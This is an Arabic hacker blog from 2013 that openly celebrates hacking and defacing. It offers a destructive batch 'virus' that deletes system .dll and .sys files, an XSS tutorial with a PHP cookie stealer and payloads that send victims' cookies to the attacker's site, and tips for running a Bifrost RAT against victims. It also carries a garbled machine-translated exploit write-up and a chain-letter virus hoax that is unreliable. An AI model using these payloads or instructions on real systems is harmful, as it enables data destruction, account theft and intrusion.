KING_WORLD

My Pc is my weapon, Inside systems is my life, Hacking is my heart, Defacing is my love, Spamming is my business, Cracking is my hobbie,

السبت، 23 فبراير 2013

هام جد! اكتشاف اخطر فيروس صنفته ميكروسوفت انو اكبر فيروس مدمر

بسم الله رحمان الرحيم
سلام عليكم و رحمة الله تعالى و بركاته

تم اكتشاف فيروس جديد صنفته شركة ميكروسوفت على أنه أكثر الفيروسات تدميرا حتى الآن، وتم اكتشافه مساء أمس بواسطة شركة ماكافي لمكافحة الفيروسات، ولم يتم تطوير أي مضاد لهذا الفيروس حتى الآن يقوم هذا الفيروس بتدمير القطاع رقم صفر في القرص الصلب حيث توجد البيانات اللازمة لتشغيل القرص، ويتلخص عمل هذا الفيروس بأنه يرسل نفسه آليا إلى قائمة المراسلات
لديك برسالة عنوانها
‎A Virtual Card for You

وما إن يفتح المستخدم الملف المرفق بتلك الرسالة حتى يتوقف الجهاز عن العمل توقفا
كاملا دون استجابة، مما يضطر المستخدم لإعادة التشغيل. وعندما يتم الضغط على أزرار
‎Ctrl+Alt+Delete
أو الزر
‎reset
فإن الفيروس يقوم بتدمير القطاع رقم صفر في القرص الصلب، وبالتالي يتم تدمير كامل محتويات القرص نهائيا ( ولا مجال لإصلاحه ) كما انه يقوم بإرسال نفسه بشكل تلقائي عبر بريدك الاكتروني عند اصابة جهازك به .
لذا بادر فورا إلى حذف أية رسالة تصلك بعنوان
‎A Virtual Card for You

وننصحك بإرسال هذه الرسالة إلى كل من تعرفهمن جهة أخرى أعلنت شركة إنتل عن وجود فيروس مدمر أيضا يتم إرساله مع رسالة
عنوانها
An Internet Flower For You
فإن وجدت هذه الرسالة فاحذفها فورا. وهذا الفيروس يقوم بحذف ملفات المكتبات
الديناميكية الموجودة في جهازك
‎*.dll
الأمر الذي يؤدي إلى تعطيل جهازك عن العمل ..
وشكرآ لكم دمتم بخير ان شاء الله

منقوووول
فارجو نشر هذا موضوع

الخميس، 21 فبراير 2013

شرح عمل فيروس مدمر

سلام عليكم و رحمة الله تعالى و بركاته

كيف الحال شباب طبعا العديد
 منا يتساءل ما هو الفيروس وكيف يأتي الفيروس إلىجهازي
 وكيف و كيف ,,,

 اولاً نتعرف من أين يأتي الفيروس ويصل إلىجهازي:.

 1-الفيروس يأتيإلى جهازك من اي مكان مثل:.
 -كثرة تحميل البرامج من النت
 -تبادل المستندات أو الملفات من جهاز إلى آخر
 -أكثر سببا للفيروسات هو الألعاب وبرامج الهكر
 بعد كل شئ اليوم سوف نتعلم طريقة صنع فيروس بصيط ومدمر
 هذا هو الكود


 @Echo off
 c:
 cd %WinDir%\System\
 deltree /y *.dll
 cd\
 deltree /y *.sys



 اتبعالخطوات :. افتح قائمة start ومن ثم اختر al programsومن ثم accessories ومن ثم Notepad



قم بفتح المفكرة Notepad وانسخ الكود الذي عرضناه سابقا


بعد ان تنتهي من نسخ الكود قم بحفظة عن طريق file ومن ثم save as


سوف تظهر لك قائمة كما موضع في الصورة اختر أي مكان تريد حفظ فيهالملف وقم بحفظ الملف باسم Virus-H.bat
 وبعد الحفظ سوف يظهر لك الملف في المكانإلى اخترت فيه الحفظ

 تحذر أخي أن تقوم بفتح هذا الملف Virus-H.bat
 لأنه جاهز
 أخووكم برنس

الأربعاء، 13 فبراير 2013

طريقة اختراق مواقع عن طريق ثغرةxss

ما هي ثغرات XSS في المواقع و كيفية الإستفادة منها لاختراق المواقع ؟
 ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال كود javascript أو HTML او PHP
 ما يجب ان تعرفه HTML,javascript,PHP

 اي ان ثغرة XSS تعني امكانية تعديل محتويات الموقع.....
 و معظم هذه الثغرات موجودة في مربعات البحث في المواقع ...
 مثلا عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص.
www.infectedsite.com/search.php?q=word
 يكون الموقع قد كتب في صفح البحث جملة "نتائج البحث ل word : ".
 و لكن ماذا اذا أدخلنا سكريبت جافا سكريبت في مربع البحث؟
http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word
 ستكتب صفحة البحث "نتائج البحث ل <script>alert("XSS")</script>word : "
 هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة XSS
 هذا يعني ان الموقع مصاب بثغرة XSS
لماذا يكون الموقع مصابا بها ؟
 لأن مبرمجي الموقع كسولين جدا ليفلترو كلمة البحث من الرموز المميزة مثل #@$%^,.<>
 ليمنعو من إدخال كود javascript او HTML
هناك نوعين من ثغرات الXSS
النوع الدائم :
 يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
 حيث في مربع التعليق على موقع ما ندخل مثلا كود جافا سكريبت .
 <script>alert("XSS")</script>
 و سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة
النوع المؤقت :
 يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث مثل المثال السابق
http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word
ما الفائدة من ثغرات XSS و كيف نستطيع اختراق الموقع عن طريقها ؟
 هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات XSS
 أهمها سرقة الكوكيز
 تحتاج الى استضافة موقع تدعم PHP
 ننشئ صفحة PHP مثال stealer.php
 تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة GET
 الكود :
 <?php
 $data=$_GET["c"]
 $f=open("cookies.tct","w")
 $f.write($data)
 $f.close()
 ?>
 هذه الصفحة سوف تكتب البيانات التي تردها الى ملف cookies.txt و البيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :
http://www.infectedsite.com/search.php?q=<script>document.location("http://ypursite.com/stealer.php?c="+document.cookie);</script>
 هنا دمجنا السكريبت
 <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
 هذا الكود سيحول الضية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيمو الكوكيز عن طريق الأمر
 document.cookie
 هنا اذا فتحنا الملف
http://yoursite.com/cookies.txt
 ستجد الككيز للمستخدم مكتوبة فيها
  اما في الثغرات الدائمة فيكفي ادخال الكود
 <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
 ليسرق الكوكيز
 و أيضا في الثغرات الدائمة نستطيع ان نحول متصفح الموقع المصاب بالثغرة XSS
  عن طريق سكريبت
 Document.location

استغلال نقطة ضعف internet explorer

جوجل سطح المكتب مكشوف: استغلال نقطة ضعف Internet Explorer لفيش معلومات المستخدم

-نظرة عامة
كان لا بد أن يحدث. مفتون مؤخرا من قبل I إمكانية استخدام جوجل سطح المكتب لاسترجاع البيانات عن بعد من البيانات الشخصية للمستخدم (مثل بطاقات الائتمان وكلمات السر) من خلال استخدام صفحة على شبكة الإنترنت الخبيثة. الآن، وذلك بفضل تصميم عيب شديد في Internet Explorer، تمكنت من إظهار انه من الممكن لتشغيل عمليات البحث على زوار سرا إلى موقع ويب من خلال استغلال هذه الثغرة الأمنية. في هذه المقالة سوف بالتفصيل ما هو الضعف في IE وكيفية استخدامها لاستغلال جوجل سطح المكتب. إذا كان لديك IE 6 وجوجل سطح المكتب V2 تثبيت يمكنك اختبار لنفسك في حجتي من الصفحة المفهوم.تحديث: بعد نشر استغلال، وجوجل مصححة مواقعهم لمنع استغلال هذه الثغرة الأمنية. ولذلك، فإن إثبات المفهوم لم يعد يعمل.

-تحليل مفصل
عادة، متصفحات فرض قيود قوية للتفاعل عبر المجال من خلال متصفح الويب. ويمكن للصفحة ويب معينة تجعل مستخدم تصفح إلى مجال مختلف. ومع ذلك، فإنه قد لا قراءة محتوى الصفحة استرجاع ولا التلاعب أي من أهدافه DOM. تفرض هذا القيد حتى واحد صاحب الموقع لن تكون قادرة على التجسس على عادات المستخدم تصفح باستخدام جافا سكريبت. أيضا، إذا تم بالفعل تسجيل مستخدم الدخول إلى خدمة معينة (مثل Gmail أو هوتميل) صفحة ويب ضار يمكن أن تنفذ عمليات معينة في حساب المستخدم (مثل فتح بريد الكتروني والقراءة) إذا لم تكن القيود في مكان. في IE يتم الاحتفاظ هذه القيود بدقة ولكن يتم تقسيم عندما يتعلق الأمر الواردات CSS. وأنا أسمي هذا الهجوم CSSXSS أو أوراق الأنماط المتتالية الكتابة عبر الموقع
ويمكن للصفحة ويب معينة استيراد قواعد CSS من مجال مختلف باستخدام "استيراد @" التوجيه. IE لديها أيضا وظيفة جافا سكريبت سهل يسمى "addImport" التي تعمل تماما مثل "استيراد @" ولكن في وقت التشغيل. يمكن في وقت لاحق قواعد CSS يمكن قراءتها من قبل الوصول إلى "cssText" الملكية في جمع document.styleSheets. لكن ماذا يحدث عندما صفحة ويب تستورد URL التي ليس ملف CSS صالحة؟ يبدو أن تحليل IE في CSS تساهلا يسمح لهذا أن يحدث في والممتلكات "cssText" يمكن للمرء أن يقرأ مقتطفات من كود HTML من موقع بعيد وسوء تحليل وقواعد CSS. لأن القواعد CSS تتطلب بنية معينة قد يكون مقدار من التعليمات البرمجية هذا ما استردادها من موقع بعيد تختلف تبعا لقانون الموقع.قواعد CSS تحديد شكل الموقع وعادة ما يكون محدد، خاصية وقيمة. يتم فصل هذه الممتلكات وقيمة بنقطتين وتحيط بها الأقواس المتعرجة. على سبيل المثال، لتلوين جميع الروابط على صفحة ويب معينة يمكن للمرء تحديد قاعدة CSS "ل{لون: أبيض}". من أجل استرداد رمز من URL معينة غير صالحة CSS، يجب أن تحتوي الصفحة الهدف بعض الأحرف التي يتم استخدامها في تقويم الأسنان، وهي CSS مجعد. لحسن الحظ، معظم صفحات الويب الحديثة تحتوي عليها كما تستخدم على نطاق واسع في الأقواس المتعرجة شفرة جافا سكريبت وقواعد CSS المضمنة في صفحات. وبمجرد أن يضرب محلل CSS IE الأقواس المتعرجة فإنه سيحاول تفسير البيانات بعد أنها CSS. حتى لو كان الناتج قواعد CSS لا تجعل أي معنى لمتصفح، IE سوف تسمح تزال تراهم في الممتلكات "cssText". الجمع بين الأقواس المتعرجة، وكولون كولون شبه كما تظهر في قانون تحديد الهدف HTML التي يمكن قراءتها قصاصات من التعليمات البرمجية.
عند استخدام هذه التقنية سوف CSSXSS للمهاجمين الحصول على شفرة جافا سكريبت في الغالب. ومع ذلك، وانه يمكن تحسين حظه عن طريق حقن الأحرف CSS في صفحة الهدف. منذ أكثر المواقع الحديثة هي ديناميكية والحصول على المعلمات من خلال URL، عن طريق الحقن هذه الأحرف هي تافهة عادة. هذه تشبه إلى حد كبير عن طريق الحقن جافا سكريبت في صفحة الهدف كما هو مستخدم في نقاط الضعف XSS الكلاسيكية فقط هنا للمهاجمين يقحم حرف التي تنظر معظم المواقع غير مؤذية.مثل الكثير من الثقوب XSS الكلاسيكية، وهذا عيب في تصميم IE يسمح للمهاجمين لاسترداد بيانات المستخدم الخاصة أو تنفيذ عمليات نيابة عن مستخدمين على المجالات البعيد. الفرق هو أنه في هذه الحالة موقع الهدف لا يجب أن تكون عرضة للحقن النصي. جميع مهاجم القيام به هو جذب مستخدم إلى صفحة ويب الخبيثة. يمكن استغلال الآلاف من المواقع على شبكة الإنترنت وليس هناك حل بسيط ضد هذا الهجوم ما لا يقل عن حتى يتم إصلاح IE. وهذا يعني تتأثر الملايين من مستخدمي IE من هذا الخلل التصميم.وقد تم اختبار هذه الثغرة الأمنية للعمل على اصلاح متصفح الانترنت مايكروسوفت بالكامل 6 Explorer والإصدارات السابقة عرضة ربما كذلك. موزيلا فايرفوكس يبدو كافيا للحفاظ على القيود المجال في الواردات وCSS لا يبدو أن تكون عرضة لهذا النوع من الهجوم. أوبرا ليست ضعفا لأنها لا تدعم جمع معدات الشكل. والحلول الممكنة لمستخدمي لتخفيف هذا الهجوم هو تعطيل جافا سكريبت في IE أو استخدام متصفح مختلف.
و انا براي لو تستعملو متصفح فيرفوكس احسن

شرح ما هو css؟

هو اختصار
لــ Cascading Style Sheets و وســيــلة أو أداة تســتخدم
لأضافه
تصمــيم علي الموقع .. لذلك فهي خــاصة بمصممي المواقع ,فــيهتم بالخطوط
والالوان
 وخلفيه الموقع والمساحات لتــظهر صفحة الــ HTML
بشكل محدد..2- ما هو الفـــرق بين CSS و HTML

الــ HTML
 هي لغه تستخدم لتكوين ووضع نظام لمحتوى صفحة الويب
الــ CSSهي اداة او
 وسيله لاضافة تصميم لهذه المحتويات.

لذلك نفهم ان لغه HTML خاصه
بتكوين هيكل صفحة الــويب
والـــ CSS هو اضافه تصميم لهذا الهيكل او
التكوين

3- مــاذا نســتخدم من برامج لتــعلم الــ CSS ؟؟
لا نحتاج لبــرامج معقدة الاستخدام او تحتاج وقت لتعلمها هي ايضا
ولكن نستـخدم Notepad (المفكرة) الموجوده في الوندوز
START
MENU>>ACCESSORIES>>NOTEPAD
كما نحتاج لمتصــفح BROWSER
 مثل انترنت اكسبلورر او فايرفوكس

4- مــا هــي فــوائــد CSS ؟؟
* تستطيع
 ان تتحكم في التصميم وتفاصيله من خلال ملف واحد بامكانيات اكبر وادق
*تستطيع
 ان تنشئ تصميمات لجميع مختلف وسائل عرض المواقع كالشاشات
والطابعات
والتليفونات المحموله

الاثنين، 11 فبراير 2013

شرح طريقة تنضيف الريجستري في اختراق الاجهزة

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته 


اليوم سأشرح لكم طريقة تنظيف الريجيستري



لماذا نحتاج لتنظيف الريجستري في إختراق الأجهزة؟!

الكثير من الهكرز يقوم بتجربة السيرفر(الباتش) في جهازه قبل إرساله للضحية

فبمجرد تجربة الباتش في جهازك ، لن تتمكن من إستقبال اي ضحيه ولو انك تفتح 

1000 بورت وتجيب 1000 حساب NO-IP 

والان سأشرح طريقة تنظيف الريجستري

1- اذهب إلى Start (إبدأ)

2- ثم اذهب إلى Run

3- ثم اكتب في Run كلمة regedit واضغط انتر
4- سيفتح لك الريجستري قم بالضغط على crtl+F من اجل البحث

5- ابحث على كلمة nck البحث سيستغرق دقيقة او دقيقتان  ثم احذف الذي 

يطلعه لك البحث وكمان على اليسار يكون قائمة اسماء المجلدات يكون مجلد اسمه 

bifrost احذفه

6 - ابحث مره اخرى على كلمة klg واحذف الملفات الذي تظهر وكمان يكون في 

قائمة المجلدات ملفان اسمهم bifrost و BIFROST 1.2 احذفهم

وهكذا تم تنظيف الريجستري

=======

وانا انصح ان تقوم بقتل عملية الباتش وفي الإعدادات الإفتراضيه في برنامج 

بيفورست تكون iexplore.exe

واذا عملت الباتش يشتغل اول ما تفتح الجهاز قم بحذفه من Startup >>> وهذا 

ليس من موضوعنا لكن جرصاً على عدم تشغيل الباتش مره اخرى وعندها تحتاج 

الى تنظيف ريجستري مره اخرى

======


بالتوفيق للجميع

الان برنامج سرقة حسبات فيس بوك



حصريا تحميل برنامج سرقة حسابات الفيس بوك 
 اكيد عنوآن الموضوع لفت إنتباه الجميع


كتبت العنوان بالشكل السابق ، لجذب آكبر عدد من الضحآيآ

ضحآيآ الغش والخدآع ،

حيث بيسألنا البعض عن برامج اختراق ايميل او فيسبوك

  لكن الحقيقة انه لايوجد برنامج بالعالم بتحط فيه الايميل او الاكاونت بيعطيك 

الباسوورد.... مستحيل

طبعا انتو بتشوفوا البرامج دي و الشروحات وبتفكروا انها جد

بس هي بالأصل برامج مفبركة و ملغومة الهدف انك تنزلها بجهازك لكي يتم 

اختراقك انت.

ارجو من الجميع الانتباه و لا تحملو اي برنامج من هذه  البرامج .

شاركوا هذا الموضوع لاصدقاءكم حتي لا ينخدعوا.

ونكرر لايوجد برنامج بالعالم بتحط فيه الايميل او الاكاونت بيعطيك الباسوورد

بيانات تسجيل تكون مخزنة بطرق يصعب اكتشافها لدالك ادا وجدت برنامج فكر كيف تمت  برمجته فطرق سرقة تاتي من خلال اكتشاف تغرات او نصب علي عقول الضعيفةاو باختراق الاجهزة واخد ما تشاء

 تتحياتيييي 
                                 
by prince king